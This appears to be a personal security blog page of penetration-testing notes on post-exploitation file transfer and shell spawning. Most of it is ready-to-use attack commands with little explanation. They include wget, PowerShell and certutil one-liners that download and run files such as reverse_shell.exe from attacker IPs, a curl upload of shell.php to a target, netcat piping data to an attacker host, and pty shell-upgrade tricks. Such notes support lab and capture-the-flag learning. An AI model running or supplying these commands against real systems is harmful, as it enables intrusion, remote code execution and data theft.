Sofblocks

Sofblocks

Cyber Security & Sys Admin.

Misc Notes

1 minute read

Exploitation:

Gaining a reverse shell:

https://consolechars.wordpress.com/2017/03/27/devtcp-forgotten-linux-delicacy/

Post Exploitation

Transfering Files:

HTTP:

  • Apache: Copying the file to /var/www/html directory and starting apache services.
  • Python 
      python -m SimpleHTTPServer 80
  python3 -m http.server 80

Downloading the files:

  • via browser in a Gui platform.
  • via shell access.
    • wget command. 
       wget http://10.10.10.100:8007/execute.py; chmod +x excute.py; ./excute.py
    • Using Powershell: 
      powershell -c "iex(new-object System.Net.WebClient).DownloadFile('http://10.10.14.30:9005/40564.exe', 'c:\Users\Public\Downloads\40564.exe')"
powershell -exec bypass -c (new-object System.Net.WebClient).DownloadFile('http://10.x.x.x:8000/reverse_shell.exe','C:\Windows\Temp\patch.exe')
certutil.exe -urlcache -split -f "https://host/40564.txt" attack.txt
certutil.exe -decode attack.txt attack.exe
    • curl command. 
        curl -O http://10.10.14.30:9005/file
  Uploading:
  curl --upload-file shell.php --url http://$ip/shell.php --http1.0
    • Python. 
      python -c "from urllib import urlretrieve; urlretrieve('http://10.11.0.245/nc.exe', 'C:\\Temp\\nc.exe')"

Ftp:

      Install the python ftp library - pyftpdlib
      python -m pyftpdlib -p 21

Smb:

      python smbserver.py SHARENAME /root/shells

      Copying files:[Target Machine]
       dir \\192.168.0.201\SHARENAME
       copy \\192.168.0.201\SHARENAME\40056.exe

Protip:

   On local system:
   cat filetoupload | base64 -w 0; echo
   #double click on output to copy
   On Target System:
   echo <copiedContent> | base64 -d > filetoupload

  • Netcut:

        on attacker run:
    nc -lvp 443> transfer.txt
    on target run:
    cat transfer.txt | nc $attackerip 443

Spawning a Shell:

Python:

    python -c  'import pty; pty.spawn("/bin/sh")'
    python3 -c 'import pty; pty.spawn("/bin/sh")'
    python3 -c 'import pty; pty.spawn("/bin/bash")'

Echo:

   echo os.system('/bin/bash')

Bash and Sh:

   /bin/bash -i
   /bin/sh -i

Obtaining a interactive shell.

  1. Do CTRL+Z to background Netcat Session.

  2. Enter stty raw -echo in your terminal

  3. Run the command fg - bring Netcat back to the foreground.

List user privileges:

   Windows: 
   whoami /priv
   Unix:
   sudo -l

Posted:

Leave a comment

You may also enjoy

Azure Attack Paths Management

14 minute read

Posted:

Every object in azure (users, service principals, device, apps) combines to form attack paths that adversaries can find and exploit and take over your whole ...

Azure Cloud Pentesting

12 minute read

Posted:

The rise of cloud computing has seen many companies shifting their attention to adopting cloud services such as storage, network, database, and software appl...

Azure AD Single Sign On (SSO) - Sophos Firewall

5 minute read

Posted:

Single sign-on (SSO) is a technology which combines several different application login screens into one regardless of the domain, platform, or technology th...

Azure Powershell

5 minute read

Posted:

PowerShell is a command-based shell and scripting language used for task automation and as a configuration framework tool. PowerShell runs on Windows, Linux,...